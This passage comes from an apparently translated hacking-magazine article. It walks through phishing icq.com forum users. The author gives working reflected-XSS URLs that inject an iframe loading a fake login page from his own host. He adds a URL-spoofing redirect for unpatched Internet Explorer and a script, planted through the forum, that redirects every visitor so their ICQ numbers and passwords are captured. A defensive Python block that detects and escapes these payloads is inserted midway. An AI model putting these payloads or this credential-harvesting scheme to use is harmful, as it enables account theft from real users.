Xakep Online
[XAKEP 11 [83] 05 > HACKING 062]
I forgot to mention that when you post a message, next to your avatar you get two links: one leads to the profile mentioned at the very start of the article, the other to a profile located at roughly the following address: www.icq.com/whitepages/about_me.php?uin=559822. Naturally, this profile is full of holes too :).
[the idea and further research]
My idea looked like this: we drop a message into the forum containing a script that redirects any user hit by this CSS (cross-site scripting) to a fake page hosted on my site which looks like the forum's login page. The user enters his credentials and is sent back to the forum, while everything he typed is saved on my side. But saying it is one thing... The user will spot the fake right away if the browser's address bar shows something like http//panterka-zloyhacker.h15.ru/razvod.php. There were two ways to go here: either use url spoofing for the deception, or find one more passive vulnerability (preferably on the forum login page) and embed in it an iframe through which my fake would be displayed.
I ran down to the all-night shop for a couple of bottles of beer and set about hunting for new CSS. Fifteen minutes later I had already picked out three passive vulnerabilities, one of which was right on the login page. Here is its url with the dangerous script already embedded:
www.icq.com/karma/login_page.php?dest=http%3A%2F%2Fwww.icq.com%2Fboards%2F&sv=2&css=boards.css">
Now, after converting the parts that give the game away into uri encoding, we get:
www.icq.com/karma/login_page.php?dest=http%3A%2F%2Fwww.icq.com%2Fboards%2F&sv=2&css=boards.css%22%3E%3Ciframe%2520src%3Dhttp%3A%2F%2Fmy_site%2Flogin.php%2520height%3D100%25%2520width%3D100%25
fig. 2: the script in the vulnerable field
fig. 1: a trivial bypass of the filter on the number of input characters
As you can see, I created an iframe in which our fake, hosted on my site, would be displayed, but... this page (www.icq.com/karma/login_page.php) turned out to have no fewer than three vulnerable parameters, which means we would see three full-size (100%) iframes stacked top to bottom.
Of course, not everyone would notice, but not wanting to take the risk I had to pick a different vulnerability, in the forum's search engine:
www.icq.com/icq_preferences/sig_preview.php?sig=alert(document.cookie)
Here too I was out of luck: a limit on the number of input characters.
In the end I settled on the third CSS. Here is its url with the iframe already set up. Again, after encoding everything superfluous and ugly, we get:
www.icq.com/icq_preferences/sig_preview.php?sig=%3Ciframe+src%3Dhttp%3A%2F%2Fmy_site%2Flogin.php+height%3D100%25+width%3D100%25+scrolling=no+frameborder=0%3E
Everything went fine; the script shows up only slightly in the page's title, but on the whole it's all good.
To broaden my horizons I decided to look at one more way of deceiving the user: url spoofing. This idea was already covered in the magazine, namely No. 3 2004, p. 64, so it shouldn't give you any particular trouble. To pull off the trick, the following code has to run in the victim's browser:
location.href=unescape('http://www.icq.com|login.php%01@www.my_site/login.php');
The browser has to be an IE that hasn't been updated. Unfortunately, slashes can't be used in the first address in the script, so I had to make do with a vertical bar. Although you may well come up with something prettier :).
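The two tricks described above, the sig parameter reflected unescaped so an iframe tag lands in the page, and the userinfo-prefixed URL that an unpatched IE displayed as www.icq.com, seen from the defender's side. This is an added example, not code from the article: it parses the article's own URLs, shows which host the spoofed one really points at, and escapes the reflected parameter so the iframe is rendered as text. The host www.my_site is the author's placeholder; the function names are my own.

```python
import html
from urllib.parse import urlsplit, unquote, parse_qs

# Both URLs are taken from the article as the author wrote them ("my_site" is
# his placeholder for the phishing host); they serve here as constructed input.
SPOOFED = "http://www.icq.com|login.php%01@www.my_site/login.php"
INJECTED = ("http://www.icq.com/icq_preferences/sig_preview.php?sig="
            "%3Ciframe+src%3Dhttp%3A%2F%2Fmy_site%2Flogin.php+height%3D100%25"
            "+width%3D100%25+scrolling=no+frameborder=0%3E")
WRAP_OPEN, WRAP_CLOSE = "<div class=sig>", "</div>"

def real_host(url):
    """Host the browser actually connects to. Everything before '@' in the
    authority is userinfo, so 'www.icq.com|login.php%01' is only a decoy."""
    return urlsplit(url).hostname

def userinfo_decoy(url):
    """Flag a URL whose userinfo hides a control character (the %01 that
    truncated the address bar in unpatched IE) or looks like a hostname."""
    user = urlsplit(url).username
    if user is None:
        return False
    user = unquote(user)
    has_control = any(ord(ch) < 0x20 for ch in user)
    looks_like_host = "." in user.split("|")[0]  # crude heuristic
    return has_control or looks_like_host

def reflected_param(url, name):
    """Decode a query parameter the way sig_preview.php would receive it."""
    return parse_qs(urlsplit(url).query).get(name, [""])[0]

def render_vulnerable(value):
    # What the vulnerable page did: echo the parameter back unescaped.
    return WRAP_OPEN + value + WRAP_CLOSE

def render_fixed(value):
    # Mitigation: HTML-escape before reflecting, so '<iframe' becomes inert text.
    return WRAP_OPEN + html.escape(value, quote=True) + WRAP_CLOSE

def contains_markup(rendered):
    """Detection check on a page response: any '<' or '>' left inside the
    wrapper means user input reached the HTML unescaped."""
    inner = rendered[len(WRAP_OPEN):-len(WRAP_CLOSE)]
    return "<" in inner or ">" in inner
```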
[and now about the fake itself] There's nothing complicated here. Just save the login page to disk and edit it a little, namely change the form's action parameter, pointing it at your own file check.php instead of www.icq.com/karma/login.php. check.php itself will look like this:
[check.php]
fig.: the message-posting form at www.linuxsucks.org
fig. 3: my cookies in all their glory
Now upload these 2 files, plus the file logi.html, to a site with php support (in this case my own site, my_site). That's it, the fake is ready! Just don't forget to set the right chmod.
[putting it all together] Since the vulnerable Subject/Question parameter didn't accept more than 55 characters, I had to resort to a trick. On the forum I created a topic with the title ">. Then I created the file 1.js and put this line in it:
location.href=unescape('http://www.icq.com|login.php%01@www.my_site/login.php');
or, for the iframe variant:
location.href='http://www.icq.com/icq_preferences/sig_preview.php?sig=%3Ciframe+src%3Dhttp%3A%2F%2Fmy_site%2Flogin.php+height%3D100%25+width%3D100%25+scrolling=no+frameborder=0%3E';
The exploit placed on the forum loaded the script 1.js from my site, which redirected everyone on that forum page to my fake. The victim assumed it was a forum glitch and logged in again, thereby leaving me his UIN/primary e-mail and password, and then landed back on the board as if nothing had happened.
That's it. Now the task is how to keep the stolen UINs, but knowing the UIN/primary e-mail and the password, that's no longer a problem :).
[the leakiest site of the year :)] While I was writing this article, a global bug hunt on icq.com got under way in the closed and public sections of Antichat, and there are already some very interesting findings there (lots of passive CSS, holes that let you hijack an ICQ mailbox, and so on). Meanwhile, after the article was already finished, I found several more CSS on icq.com. So draw your own conclusions and keep researching
fig.: my fake, displayed through an iframe
fig.: my fake, using url-spoofing